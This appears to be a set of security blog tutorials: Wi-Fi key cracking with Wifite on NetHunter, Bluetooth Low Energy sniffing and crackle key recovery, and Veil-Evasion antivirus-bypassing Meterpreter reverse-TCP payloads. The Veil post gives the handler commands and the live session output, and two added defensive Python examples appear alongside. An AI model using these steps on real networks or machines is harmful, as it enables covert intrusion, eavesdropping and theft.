Sunday roundup for the 13th of March 2016. Hope you're enjoying the original posts from this week!
Please contact me if you would like to be featured on security-sleuth.com.
I wrote a post about installing Kali NetHunter a while back, which you can read here: Building the Hacker Phone. Since then I have tested quite a few features of the Kali NetHunter phone, so I thought I would share a quick and easy wifi hacking tutorial with you all.
Even prior to launching this blog I had written at least 7 or 8 wifi hacking / web cracking posts and tutorials. I never published any of them because of the clunky, annoying (but simple) sequence of steps these kinds of attacks consisted of; I'm glad to see that Kali NetHunter and Wifite change all of this.
What you can do now with a mobile device in your pocket is verging on spectacular, so without further ado let's go into the details.
Wifite is an automated wireless auditing script. If you are familiar with airmon-ng and aircrack-ng, wifite basically rolls up those tools and the process behind finding APs and automating penetration tests against them. In short, it cuts out the complexity and manual work required when running these tools from the command line.
As always, remember: I have carried out all of the steps in this post on networks and devices I own and operate; running these attacks anywhere else may be an offence.
Running wifite is very easy. To begin, navigate to the Kali menu on your NetHunter phone and tap "Launch wifite". To progress further than this you are going to need your additional wireless adapter attached to your NetHunter device. Make sure you have a small adapter, or one that uses very little power; in my earlier tests I wasn't able to get some larger adapters working with my NetHunter device.
First you will be asked which device you want to put into monitor mode. You should put your external wifi adapter into monitor mode; this will most likely show up as wlan1, whereas your phone's built-in adapter will show up as wlan0. Select the appropriate number to progress to the next step.
Based on your choice, wifite will create a monitor mode interface, which will simply listen for any traffic flowing through the ether.
Once it is done scanning you should see a constantly refreshing list of SSIDs. Press Control + C to select which APs to attack.
Now list the numbers next to the APs you want to attack and watch wifite churn through them, running a combination of active and passive attacks to try to capture enough session info to decipher a wifi key.
Please note that in this example I attacked my own network and had devices authenticating and de-authenticating multiple times to generate this information quickly.
Unlike using wifite on a Kali desktop, NetHunter introduces a few additional steps into the equation after you have successfully captured enough info to start cracking an AP's password.
NetHunter will save your session as a .cap file. If for some reason you would like to go through your capture in a program like Wireshark for analysis, you will need to convert it into a .pcap file; you can do that by going to the link here and uploading your .cap file:
From there you can upload your .cap file to the Distributed WPA PSK auditor, a service where people dedicate compute power to WPA cracking. You can upload your file by going to http://wpa-sec.stanev.org/?submit
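Before handing a capture to another tool or service, it is worth checking what the file actually is, since the .cap extension says nothing about the on-disk format. The following Python script is an added example, not code from the original post or from the wifite/NetHunter projects: it reads the libpcap global header (or recognises a pcapng section header block), reports the link-layer type, and walks the packet records to count frames and detect truncation. The file it inspects is constructed in memory (a two-frame radiotap capture), not a real capture.

```python
import struct
from typing import Any, Dict

# Link-layer types a wireless capture is likely to carry (libpcap LINKTYPE values).
LINKTYPE_NAMES = {1: "ETHERNET", 105: "IEEE802_11", 119: "PRISM_HEADER",
                  127: "IEEE802_11_RADIOTAP", 163: "IEEE802_11_AVS"}

# First four bytes read big-endian, mapped to the struct byte-order prefix needed
# for the rest of the file (the 0xA1B23C4D variants are nanosecond-resolution pcap).
PCAP_MAGICS = {0xA1B2C3D4: ">", 0xD4C3B2A1: "<", 0xA1B23C4D: ">", 0x4D3CB2A1: "<"}
PCAPNG_SHB = 0x0A0D0D0A  # pcapng Section Header Block type, same bytes in either endianness


def inspect_capture(data: bytes) -> Dict[str, Any]:
    """Identify a capture by its magic bytes; for libpcap files, read the global
    header and walk the record headers to count packets and detect truncation."""
    if len(data) < 4:
        return {"format": "unknown", "reason": "shorter than 4 bytes"}
    magic = struct.unpack(">I", data[:4])[0]
    if magic == PCAPNG_SHB:
        return {"format": "pcapng"}
    if magic not in PCAP_MAGICS:
        return {"format": "unknown", "reason": "no libpcap/pcapng magic"}
    endian = PCAP_MAGICS[magic]
    if len(data) < 24:
        return {"format": "pcap", "endian": endian, "truncated": True,
                "reason": "global header incomplete"}
    # magic, version major/minor, thiszone, sigfigs, snaplen, linktype
    _, vmaj, vmin, _tz, _sig, snaplen, linktype = struct.unpack(endian + "IHHiIII", data[:24])
    info: Dict[str, Any] = {
        "format": "pcap", "endian": endian, "version": f"{vmaj}.{vmin}",
        "snaplen": snaplen, "linktype": linktype,
        "linktype_name": LINKTYPE_NAMES.get(linktype, f"LINKTYPE_{linktype}"),
        "packets": 0, "truncated": False,
    }
    off = 24
    while off < len(data):
        if off + 16 > len(data):          # record header itself is cut off
            info["truncated"] = True
            break
        _ts, _us, incl_len, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        if incl_len > snaplen or off + 16 + incl_len > len(data):
            info["truncated"] = True      # length field disagrees with file size
            break
        info["packets"] += 1
        off += 16 + incl_len
    return info


def build_sample_pcap() -> bytes:
    """Constructed sample: little-endian libpcap, radiotap link type (127), two
    zero-filled dummy frames. Not a real capture."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 127)
    frames = [b"\x00" * 10, b"\x00" * 20]
    records = b"".join(struct.pack("<IIII", 1441512979, i, len(f), len(f)) + f
                       for i, f in enumerate(frames))
    return header + records


if __name__ == "__main__":
    print(inspect_capture(build_sample_pcap()))
```

If the check reports a libpcap file with an 802.11 or radiotap link type, Wireshark will open it as-is whatever the extension; a file that reports zero packets or truncation is not worth uploading anywhere.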
Unfortunately, since my wifi password is super complex, none of these tools were able to crack it in a timely fashion :). But the screen below shows you what your end result should look like:
It has taken much longer than expected to get this simple tutorial published; between work and study it hasn't been easy to make enough time for it. That said, if this post proves popular I'd like to take the concept of wifi heists further in future posts, with multiple tools tested and examined as well as some more in-depth scenarios, perhaps via video? In closing, I hope you found this tutorial useful or at least mildly entertaining. This is just one of the features Kali NetHunter offers; there will be many more covered soon!
As always, please let me know if you found this article useful or if you didn't. Don't forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!
One of my favourite TV shows is Person of Interest. I was just finishing up my Computer Science degree when the show first started airing, and I was amazed at how easily Reese and Finch managed to bluejack unsuspecting "numbers". In high school I had a range of Bluetooth sniffers installed on my trusty and highly customizable Sony Ericsson. Unfortunately, by the time Person of Interest started airing everyone had moved to either Android or the iPhone, and Bluetooth sniffing was never the same.
Recently I purchased the Ubertooth One to see how much Bluetooth sniffing has changed since my high school days. This post documents my first attempts at Bluetooth sniffing / cracking with the Ubertooth One.
In order to successfully set up a Bluetooth sniffing system you will need the following:
You can perform these activities on just about every major desktop operating system, but for this tutorial we focused on Kali Linux.
A word of caution: there are a number of resources on the internet dedicated to setting up the Ubertooth One, this post included. After spending a day and a half attempting to get Bluetooth sniffing working with absolutely zero background on the subject, my perseverance and can-do attitude kicked in and I had the Ubertooth and the associated scanning commands working like a charm. To save everybody the trouble, here are the golden rules for getting the Ubertooth running on your machine:
One final tip: make sure you have a range of additional Bluetooth tools you can use for Bluetooth debugging / sniffing. If you're having trouble with the install, it's good to have an arsenal of other tools you can use to verify whether the issue you are experiencing is a configuration issue or a hardware issue.
Getting the Ubertooth One set up for Bluetooth sniffing isn't the easiest activity to get up and running, so I recommend that before you go into any sniffing you walk through some of the Ubertooth One's other capabilities, i.e. spectrum analysis.
To get started, make sure you have installed Kismet and spectools for spectrum analysis. To install Kismet and spectools, follow the commands below:
root@kali:~# git clone https://www.kismetwireless.net/spectools.git
Cloning into 'spectools'
root@kali:~# cd spectools
root@kali:~/spectools# ./configure
root@kali:~/spectools# make
root@kali:~/spectools# make install
Now to run spectools, simply type:
Below are some screen captures of the spectrum analysis I performed:
Once your Ubertooth is set up and configured you can run the following commands to analyse Bluetooth traffic.
hcitool is one of the default Linux Bluetooth utilities; when run, it will return the MAC address and name of any Bluetooth devices in range:
root@kali:~# hcitool scan
ubertooth-scan, one of the Ubertooth utilities, also allows you to passively monitor Bluetooth traffic. Below is the command-line usage:
root@kali:~# ubertooth-scan -s
The majority of the scanning work I undertook was with ubertooth-btle. This allows you to capture Bluetooth traffic between Bluetooth Low Energy compatible devices. BLE is becoming one of the preferred methods of Bluetooth communication between new devices; next time you're in a store, just look at the Bluetooth devices, most of them should say Bluetooth Low Energy compatible.
To run ubertooth-btle in promiscuous mode and output the contents into a pcap file, simply run the command:
root@kali:~# ubertooth-btle -p -f -c capture.pcap
Below is a sample of what the BTLE packets look like when you run ubertooth-btle in promiscuous mode:
systime=1441512979 freq=2440 addr=8d651b4d delta_t=3.599 ms
86 9e d1 00 65 92 86 01 5d 3e 0e 5e 65 e0 61 9a 7d f7 04 c8 9f f5 45 00 ce f5 cc c8 8f 67 02 f5 4f a7 f5
Data / AA 8d651b4d (valid) / 30 bytes
    Channel Index: 17
    LLID: 2 / LL Data PDU / L2CAP start
    NESN: 1  SN: 0  MD: 0
    Data: d1 00 65 92 86 01 5d 3e 0e 5e 65 e0 61 9a 7d f7 04 c8 9f f5 45 00 ce f5 cc c8 8f 67 02 f5
    CRC:  4f a7 f5

systime=1441512979 freq=2440 addr=72f844df delta_t=146.421 ms
01 00 9b 72 68
Data / AA 72f844df (valid) / 0 bytes
    Channel Index: 17
    LLID: 1 / LL Data PDU / empty or L2CAP continuation
    NESN: 0  SN: 0  MD: 0
    Data:
    CRC:  9b 72 68
If you want to follow a specific device you can use the command below, where "00000000" would be the device's MAC address:
root@kali:~# ubertooth-btle -a 00000000
Crackle is an easy-to-use brute-force cracking utility. Since most Bluetooth pairing codes, which encrypt traffic between two devices, are only 4-6 digits long, they can be easily cracked if the pairing between the two devices is captured, and this also allows you to listen in on future interactions between the two devices, as we will show shortly. But first let's walk through installing crackle, which can be done by following the commands below:
root@kali:~# tar xf crackle-0.1.tgz
root@kali:~# cd crackle-0.1
root@kali:~/crackle-0.1# ls
aes.c      aes-enc.c  aes_i.h  COPYING    crackle.h  README
aes-ccm.c  aes.h      AUTHORS  crackle.c  Makefile   test.c
root@kali:~/crackle-0.1# make
cc -Wall -Werror -g   -c -o crackle.o crackle.c
cc -Wall -Werror -g   -c -o aes.o aes.c
cc -Wall -Werror -g   -c -o aes-ccm.o aes-ccm.c
cc -Wall -Werror -g   -c -o aes-enc.o aes-enc.c
cc -Wall -Werror -g   -c -o test.o test.c
cc -o crackle crackle.o aes.o aes-ccm.o aes-enc.o test.o -lpcap
root@kali:~/crackle-0.1# make install
Once crackle is installed we can walk through using it to decrypt pcap files containing Bluetooth data. To do this, simply run the following command on your desired pcap file:
root@kali:~/crackle-sample# crackle -i ltk_exchange.pcap -o decrypted.pcap
TK found: 000000
ding ding ding, using a TK of 0! Just Cracks(tm)
Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3
Now, to listen in on future communications between the two devices, run the following command on a pcap file and supply the LTK value you discovered earlier:
root@kali:~/crackle-sample# crackle -i encrypted_known_ltk.pcap -o decrypted2.pcap -l 7f62c053f104a5bbe68b1d896a2ed49c
Warning: packet is too short to be encrypted (1), skipping
Warning: packet is too short to be encrypted (2), skipping
Warning: could not decrypt packet! Copying as is..
Warning: could not decrypt packet! Copying as is..
Warning: could not decrypt packet! Copying as is..
Warning: invalid packet (length to long), skipping
Done, processed 297 total packets, decrypted 7
With some of my own BLE captures there wasn't enough packet info to run crackle successfully, so I ran crackle against some sample files to give an overview of how the tool works.
Here are a few good resources you should check out:
Bluetooth, hopefully this article packages it up into a nice, easily digestible format, as the process of getting to this level wasn't that straightforward or error free.
As always, please let me know if you found this article useful or if you didn't. Don't forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!
After my second post, "Using Metasploit to Hack an Android Phone", which you can read here, I received an outpouring of positive feedback, particularly on Twitter, from a number of readers. One of those readers, @pvtcussol, asked if I had ever used the tool Veil. At that stage I hadn't, but I promised that as soon as I did use Veil I would document it all in a post, so @pvtcussol, this one's for you!
Veil is billed as a tool capable of bypassing the antivirus solutions commonly deployed on endpoints during pen testing engagements. Veil does this by generating random and unique payloads for exploits; we can compare these payloads to polymorphic malware, which changes as it moves from host to host, giving it an advantage over traditional malware, which has a distinct signature that can be picked up by most antivirus solutions. Veil's payloads are compatible with popular penetration testing frameworks like Metasploit, making them very easy to incorporate into your penetration testing toolkit.
A number of people have asked me why you would need such a powerful tool on a penetration test. There are a number of reasons why you need tools like this in penetration tests, but I think the most significant is that skilled attackers will, for the most part, be using entirely custom exploits and tools; there is a high probability that these attackers have made sure the tools they use are either undetectable by antivirus solutions or have some mechanism that can disable antivirus. Effectively, Veil makes sure that when you use it you are much stealthier, and your customers get more for their money, because your tools are capable of bypassing their first line of defence, which wouldn't stop a serious, dedicated and persistent attacker anyway.
With all of this in mind, I decided to see how effective Veil was.
For this post I used the following devices and tools:
As for setup:
This example carries out all of the following activities on a single network. It can be modified to work across multiple networks and on a range of devices.
As I do with any post that involves powerful tools, a disclaimer: I owned all of the devices used in this example. If you were to replicate this example with devices you do not own, or do not have permission from the owner to use, it may be a criminal offence.
After doing some research I found that setting up Veil is quite easy (most *nix users could do it); you basically need to run these four commands from your home directory. As you will see below, I performed the Veil installation on Kali Linux.
root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
.... Output omitted ....
2015-02-08 18:47:11 (85.9 KB/s) - `master' saved [5490594/5490594]
root@kali:~# unzip master
.... Output omitted ....
root@kali:~# cd Veil-Evasion-master/setup
Now you will run through a lengthy but simple setup process. A portion of the setup process involves some GUI steps; just click "Next", "Agree" and "Finished" where appropriate.
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
.... Output omitted ....
[*] Ensuring this account owns veil output directory...
So now that Veil is installed you can try it out!
Immediately after installing Veil I decided to generate a payload. You do this by running a Python script called "Veil-Evasion.py", so here goes:
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
When starting up Veil you see a simple, straightforward menu. I decided to list all of the payloads first to see what was available; at the time of writing there were 39 payloads available, but this will keep growing over time:
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Main Menu

    39 payloads loaded

 Available commands:

    use         use a specific payload
    info        information on a specific payload
    list        list available payloads
    update      update Veil to the latest version
    clean       clean out payload folders
    checkvt     check payload hashes vs. VirusTotal
    exit        exit Veil

 [>] Please enter a command: list
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Available payloads:

    1)  auxiliary/coldwar_wrapper
    2)  auxiliary/pyinstaller_wrapper
    3)  c/meterpreter/rev_http
    4)  c/meterpreter/rev_http_service
    5)  c/meterpreter/rev_tcp
    6)  c/meterpreter/rev_tcp_service
    7)  c/shellcode_inject/flatc
    8)  cs/meterpreter/rev_http
    9)  cs/meterpreter/rev_https
    10) cs/meterpreter/rev_tcp
    11) cs/shellcode_inject/base64_substitution
    12) cs/shellcode_inject/virtual
    13) native/Hyperion
    14) native/backdoor_factory
    15) native/pe_scrambler
    16) powershell/meterpreter/rev_http
    17) powershell/meterpreter/rev_https
    18) powershell/meterpreter/rev_tcp
    19) powershell/shellcode_inject/download_virtual
    20) powershell/shellcode_inject/psexec_virtual
    21) powershell/shellcode_inject/virtual
    22) python/meterpreter/rev_http
    23) python/meterpreter/rev_http_contained
    24) python/meterpreter/rev_https
    25) python/meterpreter/rev_https_contained
    26) python/meterpreter/rev_tcp
    27) python/shellcode_inject/aes_encrypt
    28) python/shellcode_inject/arc_encrypt
    29) python/shellcode_inject/base64_substitution
    30) python/shellcode_inject/des_encrypt
    31) python/shellcode_inject/flat
    32) python/shellcode_inject/letter_substitution
    33) python/shellcode_inject/pidinject
    34) ruby/meterpreter/rev_http
    35) ruby/meterpreter/rev_http_contained
    36) ruby/meterpreter/rev_https
    37) ruby/meterpreter/rev_https_contained
    38) ruby/meterpreter/rev_tcp
    39) ruby/shellcode_inject/flat
After looking at the payloads, the one I decided on was number 26, the Meterpreter reverse TCP payload, mainly because I had used that payload before with Metasploit. Before choosing it I used the info command, which gives you a neat little write-up on the payload:
 [>] Please enter a command: info 26
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload information:

    Name:           python/meterpreter/rev_tcp
    Language:       python
    Rating:         Excellent
    Description:    pure windows/meterpreter/reverse_tcp stager, no shellcode

 Required Options:

    Name            Current Value   Description
    ----            -------------   -----------
    LHOST                           IP of the metasploit handler
    LPORT           4444            Port of the metasploit handler
    compile_to_exe  Y               Compile to an executable
    expire_payload  X               Optional: Payloads expire after "X" days
    use_pyherion    N               Use the pyherion encrypter
To pick a payload to generate, use the "use" command along with the number of the payload you would like to generate. After this you set the LHOST (which should be the IP of the machine you are running Kali on) and then run the generate command.
 [>] Please enter a command: use 26
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: python/meterpreter/rev_tcp loaded

 Required Options:

    Name            Current Value   Description
    ----            -------------   -----------
    LHOST                           IP of the metasploit handler
    LPORT           4444            Port of the metasploit handler
    compile_to_exe  Y               Compile to an executable
    expire_payload  X               Optional: Payloads expire after "X" days
    use_pyherion    N               Use the pyherion encrypter

 Available commands:

    set         set a specific option value
    info        show information about the payload
    generate    generate payload
    back        go to the main menu
    exit        exit Veil

 [>] Please enter a command: set LHOST 192.168.0.14
 [>] Please enter a command: generate
After hitting generate you will be prompted to choose what type of output the generator produces and a name for the output:
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: testPayload

 [?] How would you like to create your payload executable?

     1 - Pyinstaller (default)
     2 - Pwnstaller (obfuscated Pyinstaller loader)
     3 - Py2Exe

 [>] Please enter the number of your choice: 1
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec
176 INFO: Testing for ability to set icons, version resources...
189 INFO: ... resource update available
191 INFO: UPX is not available.
1707 INFO: checking Analysis
1707 INFO: building Analysis because out00-Analysis.toc non existent
1707 INFO: running Analysis out00-Analysis.toc
1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1720 INFO: Searching for file msvcr90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1720 INFO: Searching for file msvcp90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1720 INFO: Searching for file msvcm90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py
4082 INFO: Hidden import 'encodings' has been found otherwise
4084 INFO: Looking for run-time hooks
4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt
4911 INFO: checking PYZ
4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4911 INFO: building PYZ out00-PYZ.toc
5546 INFO: checking PKG
5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5546 INFO: building PKG out00-PKG.pkg
6628 INFO: checking EXE
6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing
6628 INFO: building EXE from out00-EXE.toc
6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe

 Language:          python
 Payload:           python/meterpreter/rev_tcp
 Required Options:  LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y  expire_payload=X  use_pyherion=N
 Payload File:      /usr/share/veil-output/source/testPayload.py
 Handler File:      /usr/share/veil-output/handlers/testPayload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)
So with the payload generated, let's move on to see if it gets picked up by a scanner.
Going back to my post "Using Metasploit to Hack an Android Phone": to get a Meterpreter session on an Android phone I had to craft a Metasploit payload and disguise it as an .apk file so I could install it and open a Meterpreter session for Metasploit. Out of habit I generally keep the files and outputs I create when trying out new tools or working on potential blog posts, and all of the materials from that post were kept on a flash drive. On every single occasion I plug it into my Windows machine, I get the pop-up below:
So this exercise really does show that antivirus, despite what people say, does provide some real value for users. But watch what happens when we scan a Veil payload:
After seeing the above results I still didn't believe that it wasn't returning even the slightest hint of a warning, so I also tried copying over the Python files used to generate the malicious payload and scanning them. As you can see below, they also didn't return any warnings:
Most Veil tutorials end here, with the author uploading the Veil payload to VirusTotal or a similar service despite being told not to by the authors of Veil. In this example I'm not going to upload the file to any online services; I am, however, going to go a step further and see how a Veil payload interacts with Metasploit.
I wanted to see how Veil works. It also supplies a handler script to configure all of the Metasploit parameters, but in this case I decided to do it manually. I typed in the necessary commands and accessed the victim machine via the Meterpreter session created by the payload (a quick note here: before you get any access to the target machine you have to make sure the victim has run the Veil payload).
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.14
LHOST => 192.168.0.14
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.14:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (769536 bytes) to 192.168.0.30
[*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.30:1045) at 2015-02-14 10:30:28 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Once the session was ready I ran a few Meterpreter commands to verify that Veil had worked and had given me a session on a remote PC:
meterpreter > pwd
C:\Documents and Settings\victim\Desktop
meterpreter > get uid
[-] Unknown command: get.
meterpreter > getuid
Server username: XPTEST-0000000\victim
meterpreter > idletime
User has been idle for: 9 mins 7 secs
meterpreter > ls

Listing: C:\Documents and Settings\victim\Desktop
================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2015-02-13 23:08:15 +0000  .
40777/rwxrwxrwx   0        dir   2014-07-13 04:44:45 +0000  ..
100666/rw-rw-rw-  28521    fil   2006-02-28 12:00:00 +0000  Blue hills.jpg
100777/rwxrwxrwx  3512798  fil   2015-02-08 20:38:14 +0000  testPayload.exe
100666/rw-rw-rw-  1400     fil   2015-02-08 20:37:04 +0000  testPayload.py
100666/rw-rw-rw-  143      fil   2015-02-08 20:37:04 +0000  testPayload_handler.rc

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                   Path
 ---   ----  ----              ----  -------     ----                   ----
 0     0     [System Process]        4294967295
 4     0     System            x86   0
 352   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM    \SystemRoot\System32\smss.exe
 560   668   alg.exe           x86   0                                  C:\WINDOWS\System32\alg.exe
 600   352   csrss.exe         x86   0           NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\csrss.exe
 624   352   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\winlogon.exe
 668   624   services.exe      x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\services.exe
 680   624   lsass.exe         x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\lsass.exe
 832   668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\svchost.exe
 912   668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1004  1028  wscntfy.exe       x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\wscntfy.exe
 1012  1676  cmd.exe           x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\cmd.exe
 1028  668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\System32\svchost.exe
 1068  1028  wuauclt.exe       x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\wuauclt.exe
 1108  668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1184  668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1192  1676  testPayload.exe   x86   0           XPTEST-0000000\victim  C:\Documents and Settings\victim\Desktop\testPayload.exe
 1200  1192  testPayload.exe   x86   0           XPTEST-0000000\victim  C:\Documents and Settings\victim\Desktop\testPayload.exe
 1388  668   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\spoolsv.exe
 1496  668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\System32\svchost.exe
 1676  1624  explorer.exe      x86   0           XPTEST-0000000\victim  C:\WINDOWS\Explorer.EXE
 1940  1676  ClamTray.exe      x86   0           XPTEST-0000000\victim  C:\Program Files\ClamWin\bin\ClamTray.exe
As you can see it worked!
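Looking at that process list from the defender's side, two things stand out that do not depend on a signature: the payload runs from the user's Desktop rather than a system or Program Files directory, and PID 1200 is a second copy of testPayload.exe whose parent, PID 1192, is the same executable. The second pattern is how a PyInstaller one-file executable behaves (the bootloader unpacks its archive and re-launches itself), so it is worth flagging on its own. The Python below is an added example, not code from the original post or from Veil; it encodes those two heuristics and runs them over a constructed subset of the meterpreter ps output above. The directory prefixes are assumptions for an XP-era host.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: str
    path: str


# Constructed subset of the meterpreter `ps` listing shown above.
SAMPLE_PROCS: List[Proc] = [
    Proc(668, 624, "services.exe", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\services.exe"),
    Proc(832, 668, "svchost.exe", r"NT AUTHORITY\SYSTEM", r"C:\WINDOWS\system32\svchost.exe"),
    Proc(1012, 1676, "cmd.exe", r"XPTEST-0000000\victim", r"C:\WINDOWS\system32\cmd.exe"),
    Proc(1192, 1676, "testPayload.exe", r"XPTEST-0000000\victim",
         r"C:\Documents and Settings\victim\Desktop\testPayload.exe"),
    Proc(1200, 1192, "testPayload.exe", r"XPTEST-0000000\victim",
         r"C:\Documents and Settings\victim\Desktop\testPayload.exe"),
    Proc(1676, 1624, "explorer.exe", r"XPTEST-0000000\victim", r"C:\WINDOWS\Explorer.EXE"),
    Proc(1940, 1676, "ClamTray.exe", r"XPTEST-0000000\victim",
         r"C:\Program Files\ClamWin\bin\ClamTray.exe"),
]

# Assumed directory layout: profile directories on XP and on Vista+ hosts.
USER_WRITABLE_PREFIXES = ("c:\\documents and settings\\", "c:\\users\\")
# Locations a standard user cannot normally write to; self-spawns from here are ignored.
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\")


def runs_from_user_dir(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def runs_from_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_PREFIXES)


def find_suspicious(procs: List[Proc]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for every process that trips at least one heuristic:
    (1) image lives in a user-writable profile directory;
    (2) the parent is the very same image outside a system directory, which is the
        re-launch pattern of one-file packers such as PyInstaller."""
    by_pid = {p.pid: p for p in procs}
    findings: Dict[int, List[str]] = {}
    for p in procs:
        reasons: List[str] = []
        if runs_from_user_dir(p.path):
            reasons.append("image runs from a user-writable profile directory")
        parent = by_pid.get(p.ppid)
        if (parent is not None
                and parent.path.lower() == p.path.lower()
                and not runs_from_system_dir(p.path)):
            reasons.append(f"re-launched copy of parent PID {parent.pid} "
                           "(one-file packer bootstrap pattern)")
        if reasons:
            findings[p.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_PROCS).items():
        print(pid, "->", "; ".join(reasons))
```

Neither rule alone proves anything (installers and some legitimate packers behave the same way), but a user-writable image path combined with a self-spawned child is a sensible trigger for a closer look, and both facts come from ordinary process telemetry with no signature involved.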
Normally in this section I provide a brief rundown of protective and preventative measures to help stop the above from happening. I will do that, but in addition I just want to say that I hope most small and medium businesses/organisations are seriously looking at more protection methods than just endpoint protection and firewalls, because most of the tools out there are capable of bypassing those.
Now back to the prevention/protection methods:
Please let me know if you found this article useful or if you didn't, and leave a comment below to let me know another area you would be interested in reading posts about.
After some more advice from Twitter: instead of running Metasploit and manually configuring all of the exploit details, you can just do the following: